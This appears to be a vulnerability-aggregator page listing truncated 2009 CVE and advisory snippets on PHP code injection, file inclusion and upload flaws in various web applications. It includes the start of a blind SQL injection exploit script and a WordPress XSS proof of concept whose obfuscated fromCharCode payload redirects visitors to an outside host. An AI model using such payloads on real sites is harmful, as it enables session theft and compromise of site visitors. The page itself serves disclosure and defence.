Code injection

Static code injection vulnerability in admin.php in sun-jester OpenNews 1.0 allows remote authenticated administrators to inject arbitrary PHP code into config.php via the "Overall Width" field in a setconfig action...

CVE-2009-2736

Static code injection vulnerability in admin.php in sun-jester OpenNews 1.0 allows remote authenticated administrators to inject arbitrary PHP code into config.php via the "Overall Width" field in a setconfig action...

CVE-2009-2736

CVE-2009-2736 concerns sun-jester OpenNews 1.0. The vulnerability is a static code injection in admin.php that allows remote authenticated administrators to inject arbitrary PHP code into config.php via the “Overall Width” field in a setconfig action. The issue originates from the admin.php compo...

CVE-2009-2736

Static code injection vulnerability in admin.php in sun-jester OpenNews 1.0 allows remote authenticated administrators to inject arbitrary PHP code into config.php via the "Overall Width" field in a setconfig action...

Papoo CMS 3.7.3 - (Authenticated) Arbitrary Code Execution

Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution Advisory: Papoo CMS: Authenticated Arbitrary Code Execution The Papoo CMS allows authenticated users to upload GIF, JPG and PNG images if they have the "upload images" privilege, which is true for all default groups that can access the...

[RT-SA-2009-005] Papoo CMS: Authenticated Arbitrary Code Execution

Advisory: Papoo CMS: Authenticated Arbitrary Code Execution The Papoo CMS allows authenticated users to upload GIF, JPG and PNG images if they have the "upload images" privilege, which is true for all default groups that can access the administrative interface. The CMS checks the uploaded images...

CVE-2009-2634

PHP remote file inclusion vulnerability in toolbarext.php in the MediaLibrary commedialibrary component 1.5.3 Basic for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter...

CVE-2009-2635

PHP remote file inclusion vulnerability in toolbarext.php in the RealEstateManager comrealestatemanager component 1.0 Basic for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter...

Allomani Mobile 2.5 Remote Blind SQL Injection Exploit

No description provided by source. ?php iniset"maxexecutiontime",0; printr' || || | || o,7 || . o7 || q||| o///, : / / . /QQQQQQQQQQQQQQQQQQQ\ q Allomani Mobile v2.5 /QQQ/\QQQ\ Blind SQL inj. exploit /QQQQQ/ \QQQQQQ\ q GET 3 /QQQQ/ QQQQ\ /QQQQ/ \QQQQ\ q http://allomani.com |QQQQ/ By Qabandi \QQQQ...

iShowMusic V1. 2 Write a shell vulnerability-vulnerability warning-the black bar safety net

A few days before the announcement of the vulnerability, these days quite busy, today only see. Just some time ago using this program to do a music station, in the own Station test is successful, by the way also fill the lower holes. -------- Vulnerability description: iShow Music is a basic set...

TikiWiki jhot Remote Command Execution

TikiWiki contains a flaw that may allow a malicious user to execute arbitrary PHP code. The issue is triggered due to the jhot.php script not correctly verifying uploaded files. It is possible that the flaw may allow arbitrary PHP code execution by uploading a malicious PHP script resulting in a...

wordpress281 comments show xss vulnerability-vulnerability warning-the black bar safety net

Ghost boy’blog, XEYE’s blogto assist in testing. POC: the 1. In the comment URL field, fill in the 2. 3. http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location. href=String. fromCharCode104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,11...

DM FileManager <= 3.9.4 RFI Vulnerability - Active Check

DM FileManager is prone to a remote file inclusion RFI vulnerability. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVE-2009-2396

PHP remote file inclusion vulnerability in template/album.php in DM Albums 1.9.2, as used standalone or as a WordPress plugin, allows remote attackers to execute arbitrary PHP code via a URL in the SECURITYFILE parameter...

CVE-2009-2399

PHP remote file inclusion vulnerability in dm-albums/template/album.php in DM FileManager 3.9.4, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the SECURITYFILE parameter...

Format string

Drupal 6.x before 6.13 does not prevent users from modifying user signatures after the associated comment format has been changed to an administrator-controlled input format, which allows remote authenticated users to inject arbitrary web script, HTML, and possibly PHP code via a crafted user...

CVE-2009-2371

The CVE-2009-2371 entry affects the Drupal module Advanced Forum (6.x) prior to 6.x-1.1. The issue arises when the module allows users to modify their signatures after the comment format has been switched to an administrator-controlled input format, enabling remote authenticated users to inject a...

Unrestricted file upload

Unrestricted file upload vulnerability in index.php in phpGreetCards 3.7 allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a via a link that is listed by userfiles/numbershell.php...

Code injection

Multiple static code injection vulnerabilities in CMS Chainuk 1.2 and earlier allow remote attackers to inject arbitrary PHP code 1 into settings.php via the menu parameter to adminsettings.php or 2 into a content/=NUMBER.php file via the title parameter to adminnew.php...

CVE-2009-2331

Multiple static code injection vulnerabilities in CMS Chainuk 1.2 and earlier allow remote attackers to inject arbitrary PHP code 1 into settings.php via the menu parameter to adminsettings.php or 2 into a content/=NUMBER.php file via the title parameter to adminnew.php...